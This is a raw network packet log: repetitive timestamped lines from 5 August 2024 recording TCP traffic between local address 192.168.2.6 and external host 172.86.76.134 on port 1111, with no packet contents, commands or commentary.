                              Aug 5, 2024 14:40:49.428968906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.428980112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.428991079 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429003954 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429014921 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429018974 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.429047108 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.429069042 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.429192066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429203987 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429214954 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429229021 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429250956 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.429280996 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.429426908 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429440975 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429451942 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429462910 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429475069 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429486036 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.429510117 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.429698944 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429711103 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429721117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429733992 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429745913 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429754972 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.429757118 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429785967 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.429805994 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.429968119 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.429980040 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430021048 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.430031061 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430042982 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430053949 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430067062 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430073977 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.430097103 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.430512905 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430525064 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430536032 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430553913 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430565119 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430567026 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.430576086 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430588007 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430593967 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.430598021 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430609941 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430609941 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.430622101 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430630922 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.430633068 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430643082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430650949 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.430655003 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430666924 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.430686951 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.430711031 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.431256056 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431268930 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431278944 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431291103 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431303024 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431313038 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431323051 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.431323051 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.431324959 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431338072 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431349993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431355000 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.431359053 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431375027 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431380987 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.431401968 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.431420088 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.431940079 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431952953 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431962013 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431972980 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431983948 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431994915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.431993961 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.432005882 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432015896 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432018042 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.432027102 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432037115 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432038069 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.432048082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432058096 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432066917 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.432069063 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432079077 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432090044 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432101011 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.432111979 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432121038 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.432126999 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432159901 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.432889938 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432904005 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432914972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432926893 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432938099 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432945013 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.432949066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432960987 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432971001 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432971001 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.432981968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.432991028 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.432992935 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433003902 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433012009 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.433016062 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433026075 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433032036 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.433037043 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433047056 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433051109 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.433058023 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433068991 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433077097 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.433080912 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433096886 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.433126926 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.433815956 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433829069 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433840036 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433852911 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433865070 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433871984 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.433876038 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433886051 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433892965 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.433898926 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433909893 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433914900 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.433922052 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433933020 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433945894 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433952093 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.433959007 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.433969975 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.434010029 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.434299946 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.434396982 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.434408903 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.434417963 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.434429884 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.434441090 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.434449911 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.434452057 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.434464931 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.434475899 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.434493065 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.434514999 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.517750025 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.517776966 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.517790079 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.517802000 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.517816067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.517832041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.517863035 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.517908096 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.517935991 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.517949104 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.517981052 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.517988920 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.517993927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518003941 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518016100 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518049955 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.518073082 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.518361092 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518373013 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518383980 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518395901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518408060 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518420935 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518421888 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.518433094 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518445969 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518469095 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.518469095 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.518500090 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.518682957 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518706083 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518754959 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.518870115 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518882990 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518893003 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518904924 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518915892 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518923044 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.518929005 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518940926 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518945932 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.518954039 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518963099 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.518965960 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518979073 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.518990993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519002914 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519009113 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.519020081 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519026041 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.519049883 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.519661903 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519675016 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519685984 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519696951 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519707918 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519717932 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.519720078 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519736052 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519747972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519757986 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.519758940 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519757986 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.519772053 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519778013 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.519783974 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.519799948 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.519825935 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.520411968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520422935 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520433903 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520445108 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520457029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520464897 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.520467997 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520479918 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520502090 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.520505905 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520519018 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520529985 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520531893 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.520541906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520553112 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.520554066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520565987 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520569086 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.520577908 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520590067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520601034 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.520605087 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.520620108 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.520652056 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.521203041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521215916 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521225929 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521238089 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521250010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521260023 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.521260977 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521274090 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521284103 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.521285057 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521296024 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521302938 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.521307945 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521320105 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521323919 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.521330118 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521342993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521353960 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521365881 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521378040 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521379948 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.521389961 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.521403074 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.521420956 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.522066116 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522078991 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522089958 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522102118 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522113085 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522125006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522125959 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.522136927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522150993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522177935 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522180080 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.522188902 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522197008 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.522201061 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522214890 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522216082 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.522226095 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522238016 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522248983 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522248983 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.522260904 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522272110 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522270918 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.522285938 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522294998 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.522296906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522314072 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.522346020 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.522974968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.522989035 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523000002 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523011923 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523024082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523036003 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523041964 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523058891 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.523058891 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.523174047 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.523360014 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523370981 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523380995 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523391962 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523402929 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523408890 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.523415089 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523427963 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.523432016 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.523471117 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.606195927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606240034 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606251001 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606264114 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606359005 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606359959 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.606370926 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606380939 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606394053 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606426954 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.606455088 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.606615067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606626034 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606636047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606647968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606658936 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606663942 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.606668949 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606682062 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606697083 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.606719971 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.606987953 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.606998920 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607008934 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.607018948 CEST111149721172.86.76.134192.168.2.6
